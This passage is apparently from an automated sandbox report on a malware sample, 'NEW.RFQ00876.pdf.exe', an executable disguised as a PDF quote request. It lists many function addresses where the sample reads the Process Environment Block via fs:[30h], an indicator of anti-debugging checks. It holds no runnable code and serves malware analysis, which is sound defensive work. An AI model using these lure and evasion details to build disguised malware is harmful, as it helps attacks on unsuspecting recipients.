                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018E62A0 mov eax, dword ptr fs:[00000030h]15_2_018E62A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018E62A0 mov eax, dword ptr fs:[00000030h]15_2_018E62A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185A2C3 mov eax, dword ptr fs:[00000030h]15_2_0185A2C3
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185A2C3 mov eax, dword ptr fs:[00000030h]15_2_0185A2C3
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185A2C3 mov eax, dword ptr fs:[00000030h]15_2_0185A2C3
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185A2C3 mov eax, dword ptr fs:[00000030h]15_2_0185A2C3
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185A2C3 mov eax, dword ptr fs:[00000030h]15_2_0185A2C3
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018602E1 mov eax, dword ptr fs:[00000030h]15_2_018602E1
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018602E1 mov eax, dword ptr fs:[00000030h]15_2_018602E1
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018602E1 mov eax, dword ptr fs:[00000030h]15_2_018602E1
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0184823B mov eax, dword ptr fs:[00000030h]15_2_0184823B
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D8243 mov eax, dword ptr fs:[00000030h]15_2_018D8243
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D8243 mov ecx, dword ptr fs:[00000030h]15_2_018D8243
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0184A250 mov eax, dword ptr fs:[00000030h]15_2_0184A250
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01856259 mov eax, dword ptr fs:[00000030h]15_2_01856259
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01900274 mov eax, dword ptr fs:[00000030h]15_2_01900274
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01900274 mov eax, dword ptr fs:[00000030h]15_2_01900274
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01900274 mov eax, dword ptr fs:[00000030h]15_2_01900274
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01900274 mov eax, dword ptr fs:[00000030h]15_2_01900274
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01900274 mov eax, dword ptr fs:[00000030h]15_2_01900274
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01900274 mov eax, dword ptr fs:[00000030h]15_2_01900274
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01900274 mov eax, dword ptr fs:[00000030h]15_2_01900274
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01900274 mov eax, dword ptr fs:[00000030h]15_2_01900274
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01900274 mov eax, dword ptr fs:[00000030h]15_2_01900274
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01900274 mov eax, dword ptr fs:[00000030h]15_2_01900274
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01900274 mov eax, dword ptr fs:[00000030h]15_2_01900274
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01900274 mov eax, dword ptr fs:[00000030h]15_2_01900274
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01854260 mov eax, dword ptr fs:[00000030h]15_2_01854260
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01854260 mov eax, dword ptr fs:[00000030h]15_2_01854260
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01854260 mov eax, dword ptr fs:[00000030h]15_2_01854260
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0184826B mov eax, dword ptr fs:[00000030h]15_2_0184826B
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01884588 mov eax, dword ptr fs:[00000030h]15_2_01884588
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01852582 mov eax, dword ptr fs:[00000030h]15_2_01852582
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01852582 mov ecx, dword ptr fs:[00000030h]15_2_01852582
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188E59C mov eax, dword ptr fs:[00000030h]15_2_0188E59C
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D05A7 mov eax, dword ptr fs:[00000030h]15_2_018D05A7
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D05A7 mov eax, dword ptr fs:[00000030h]15_2_018D05A7
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D05A7 mov eax, dword ptr fs:[00000030h]15_2_018D05A7
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018745B1 mov eax, dword ptr fs:[00000030h]15_2_018745B1
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018745B1 mov eax, dword ptr fs:[00000030h]15_2_018745B1
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188E5CF mov eax, dword ptr fs:[00000030h]15_2_0188E5CF
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188E5CF mov eax, dword ptr fs:[00000030h]15_2_0188E5CF
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018565D0 mov eax, dword ptr fs:[00000030h]15_2_018565D0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188A5D0 mov eax, dword ptr fs:[00000030h]15_2_0188A5D0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188A5D0 mov eax, dword ptr fs:[00000030h]15_2_0188A5D0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187E5E7 mov eax, dword ptr fs:[00000030h]15_2_0187E5E7
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187E5E7 mov eax, dword ptr fs:[00000030h]15_2_0187E5E7
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187E5E7 mov eax, dword ptr fs:[00000030h]15_2_0187E5E7
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187E5E7 mov eax, dword ptr fs:[00000030h]15_2_0187E5E7
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187E5E7 mov eax, dword ptr fs:[00000030h]15_2_0187E5E7
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187E5E7 mov eax, dword ptr fs:[00000030h]15_2_0187E5E7
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187E5E7 mov eax, dword ptr fs:[00000030h]15_2_0187E5E7
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187E5E7 mov eax, dword ptr fs:[00000030h]15_2_0187E5E7
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018525E0 mov eax, dword ptr fs:[00000030h]15_2_018525E0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188C5ED mov eax, dword ptr fs:[00000030h]15_2_0188C5ED
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188C5ED mov eax, dword ptr fs:[00000030h]15_2_0188C5ED
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018E6500 mov eax, dword ptr fs:[00000030h]15_2_018E6500
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01924500 mov eax, dword ptr fs:[00000030h]15_2_01924500
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01924500 mov eax, dword ptr fs:[00000030h]15_2_01924500
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01924500 mov eax, dword ptr fs:[00000030h]15_2_01924500
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01924500 mov eax, dword ptr fs:[00000030h]15_2_01924500
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01924500 mov eax, dword ptr fs:[00000030h]15_2_01924500
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01924500 mov eax, dword ptr fs:[00000030h]15_2_01924500
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01924500 mov eax, dword ptr fs:[00000030h]15_2_01924500
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860535 mov eax, dword ptr fs:[00000030h]15_2_01860535
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860535 mov eax, dword ptr fs:[00000030h]15_2_01860535
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860535 mov eax, dword ptr fs:[00000030h]15_2_01860535
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860535 mov eax, dword ptr fs:[00000030h]15_2_01860535
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860535 mov eax, dword ptr fs:[00000030h]15_2_01860535
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860535 mov eax, dword ptr fs:[00000030h]15_2_01860535
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187E53E mov eax, dword ptr fs:[00000030h]15_2_0187E53E
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187E53E mov eax, dword ptr fs:[00000030h]15_2_0187E53E
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187E53E mov eax, dword ptr fs:[00000030h]15_2_0187E53E
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187E53E mov eax, dword ptr fs:[00000030h]15_2_0187E53E
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187E53E mov eax, dword ptr fs:[00000030h]15_2_0187E53E
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01858550 mov eax, dword ptr fs:[00000030h]15_2_01858550
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01858550 mov eax, dword ptr fs:[00000030h]15_2_01858550
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188656A mov eax, dword ptr fs:[00000030h]15_2_0188656A
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188656A mov eax, dword ptr fs:[00000030h]15_2_0188656A
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188656A mov eax, dword ptr fs:[00000030h]15_2_0188656A
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018564AB mov eax, dword ptr fs:[00000030h]15_2_018564AB
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018844B0 mov ecx, dword ptr fs:[00000030h]15_2_018844B0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018DA4B0 mov eax, dword ptr fs:[00000030h]15_2_018DA4B0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018504E5 mov ecx, dword ptr fs:[00000030h]15_2_018504E5
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01888402 mov eax, dword ptr fs:[00000030h]15_2_01888402
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01888402 mov eax, dword ptr fs:[00000030h]15_2_01888402
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01888402 mov eax, dword ptr fs:[00000030h]15_2_01888402
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0184C427 mov eax, dword ptr fs:[00000030h]15_2_0184C427
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0184E420 mov eax, dword ptr fs:[00000030h]15_2_0184E420
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0184E420 mov eax, dword ptr fs:[00000030h]15_2_0184E420
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0184E420 mov eax, dword ptr fs:[00000030h]15_2_0184E420
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D6420 mov eax, dword ptr fs:[00000030h]15_2_018D6420
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D6420 mov eax, dword ptr fs:[00000030h]15_2_018D6420
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D6420 mov eax, dword ptr fs:[00000030h]15_2_018D6420
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D6420 mov eax, dword ptr fs:[00000030h]15_2_018D6420
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D6420 mov eax, dword ptr fs:[00000030h]15_2_018D6420
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D6420 mov eax, dword ptr fs:[00000030h]15_2_018D6420
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D6420 mov eax, dword ptr fs:[00000030h]15_2_018D6420
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188A430 mov eax, dword ptr fs:[00000030h]15_2_0188A430
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188E443 mov eax, dword ptr fs:[00000030h]15_2_0188E443
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188E443 mov eax, dword ptr fs:[00000030h]15_2_0188E443
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188E443 mov eax, dword ptr fs:[00000030h]15_2_0188E443
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188E443 mov eax, dword ptr fs:[00000030h]15_2_0188E443
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188E443 mov eax, dword ptr fs:[00000030h]15_2_0188E443
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188E443 mov eax, dword ptr fs:[00000030h]15_2_0188E443
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188E443 mov eax, dword ptr fs:[00000030h]15_2_0188E443
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188E443 mov eax, dword ptr fs:[00000030h]15_2_0188E443
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0184645D mov eax, dword ptr fs:[00000030h]15_2_0184645D
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187245A mov eax, dword ptr fs:[00000030h]15_2_0187245A
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018DC460 mov ecx, dword ptr fs:[00000030h]15_2_018DC460
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187A470 mov eax, dword ptr fs:[00000030h]15_2_0187A470
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187A470 mov eax, dword ptr fs:[00000030h]15_2_0187A470
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0187A470 mov eax, dword ptr fs:[00000030h]15_2_0187A470
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018F678E mov eax, dword ptr fs:[00000030h]15_2_018F678E
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018507AF mov eax, dword ptr fs:[00000030h]15_2_018507AF
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185C7C0 mov eax, dword ptr fs:[00000030h]15_2_0185C7C0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D07C3 mov eax, dword ptr fs:[00000030h]15_2_018D07C3
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018727ED mov eax, dword ptr fs:[00000030h]15_2_018727ED
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018727ED mov eax, dword ptr fs:[00000030h]15_2_018727ED
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018727ED mov eax, dword ptr fs:[00000030h]15_2_018727ED
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018DE7E1 mov eax, dword ptr fs:[00000030h]15_2_018DE7E1
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018547FB mov eax, dword ptr fs:[00000030h]15_2_018547FB
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018547FB mov eax, dword ptr fs:[00000030h]15_2_018547FB
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188C700 mov eax, dword ptr fs:[00000030h]15_2_0188C700
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01850710 mov eax, dword ptr fs:[00000030h]15_2_01850710
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01880710 mov eax, dword ptr fs:[00000030h]15_2_01880710
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188C720 mov eax, dword ptr fs:[00000030h]15_2_0188C720
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188C720 mov eax, dword ptr fs:[00000030h]15_2_0188C720
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188273C mov eax, dword ptr fs:[00000030h]15_2_0188273C
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188273C mov ecx, dword ptr fs:[00000030h]15_2_0188273C
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188273C mov eax, dword ptr fs:[00000030h]15_2_0188273C
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018CC730 mov eax, dword ptr fs:[00000030h]15_2_018CC730
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188674D mov esi, dword ptr fs:[00000030h]15_2_0188674D
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188674D mov eax, dword ptr fs:[00000030h]15_2_0188674D
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188674D mov eax, dword ptr fs:[00000030h]15_2_0188674D
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018DE75D mov eax, dword ptr fs:[00000030h]15_2_018DE75D
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01850750 mov eax, dword ptr fs:[00000030h]15_2_01850750
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D4755 mov eax, dword ptr fs:[00000030h]15_2_018D4755
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892750 mov eax, dword ptr fs:[00000030h]15_2_01892750
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892750 mov eax, dword ptr fs:[00000030h]15_2_01892750
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01858770 mov eax, dword ptr fs:[00000030h]15_2_01858770
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860770 mov eax, dword ptr fs:[00000030h]15_2_01860770
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860770 mov eax, dword ptr fs:[00000030h]15_2_01860770
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860770 mov eax, dword ptr fs:[00000030h]15_2_01860770
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860770 mov eax, dword ptr fs:[00000030h]15_2_01860770
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860770 mov eax, dword ptr fs:[00000030h]15_2_01860770
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860770 mov eax, dword ptr fs:[00000030h]15_2_01860770
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860770 mov eax, dword ptr fs:[00000030h]15_2_01860770
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860770 mov eax, dword ptr fs:[00000030h]15_2_01860770
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860770 mov eax, dword ptr fs:[00000030h]15_2_01860770
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860770 mov eax, dword ptr fs:[00000030h]15_2_01860770
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860770 mov eax, dword ptr fs:[00000030h]15_2_01860770
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01860770 mov eax, dword ptr fs:[00000030h]15_2_01860770
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01854690 mov eax, dword ptr fs:[00000030h]15_2_01854690
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01854690 mov eax, dword ptr fs:[00000030h]15_2_01854690
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188C6A6 mov eax, dword ptr fs:[00000030h]15_2_0188C6A6
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018866B0 mov eax, dword ptr fs:[00000030h]15_2_018866B0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188A6C7 mov ebx, dword ptr fs:[00000030h]15_2_0188A6C7
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188A6C7 mov eax, dword ptr fs:[00000030h]15_2_0188A6C7
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D06F1 mov eax, dword ptr fs:[00000030h]15_2_018D06F1
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018D06F1 mov eax, dword ptr fs:[00000030h]15_2_018D06F1
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018CE6F2 mov eax, dword ptr fs:[00000030h]15_2_018CE6F2
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018CE6F2 mov eax, dword ptr fs:[00000030h]15_2_018CE6F2
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018CE6F2 mov eax, dword ptr fs:[00000030h]15_2_018CE6F2
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018CE6F2 mov eax, dword ptr fs:[00000030h]15_2_018CE6F2
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018CE609 mov eax, dword ptr fs:[00000030h]15_2_018CE609
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186260B mov eax, dword ptr fs:[00000030h]15_2_0186260B
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186260B mov eax, dword ptr fs:[00000030h]15_2_0186260B
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186260B mov eax, dword ptr fs:[00000030h]15_2_0186260B
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186260B mov eax, dword ptr fs:[00000030h]15_2_0186260B
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186260B mov eax, dword ptr fs:[00000030h]15_2_0186260B
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186260B mov eax, dword ptr fs:[00000030h]15_2_0186260B
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186260B mov eax, dword ptr fs:[00000030h]15_2_0186260B
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01892619 mov eax, dword ptr fs:[00000030h]15_2_01892619
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186E627 mov eax, dword ptr fs:[00000030h]15_2_0186E627
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01886620 mov eax, dword ptr fs:[00000030h]15_2_01886620
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01888620 mov eax, dword ptr fs:[00000030h]15_2_01888620
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0185262C mov eax, dword ptr fs:[00000030h]15_2_0185262C
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0186C640 mov eax, dword ptr fs:[00000030h]15_2_0186C640
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188A660 mov eax, dword ptr fs:[00000030h]15_2_0188A660
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0188A660 mov eax, dword ptr fs:[00000030h]15_2_0188A660
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_01882674 mov eax, dword ptr fs:[00000030h]15_2_01882674
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191866E mov eax, dword ptr fs:[00000030h]15_2_0191866E
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_0191866E mov eax, dword ptr fs:[00000030h]15_2_0191866E
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018629A0 mov eax, dword ptr fs:[00000030h]15_2_018629A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018629A0 mov eax, dword ptr fs:[00000030h]15_2_018629A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exeCode function: 15_2_018629A0 mov eax, dword ptr fs:[00000030h]15_2_018629A0
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018629A0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018509AD mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018D89B3 mov esi, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018D89B3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0191A9D3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018E69C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_0185A9D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018849D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018DE9E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018829F9 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\NEW.RFQ00876.pdf.exe | Code function: 15_2_018CE908 mov eax, dword ptr fs:[00000030h]
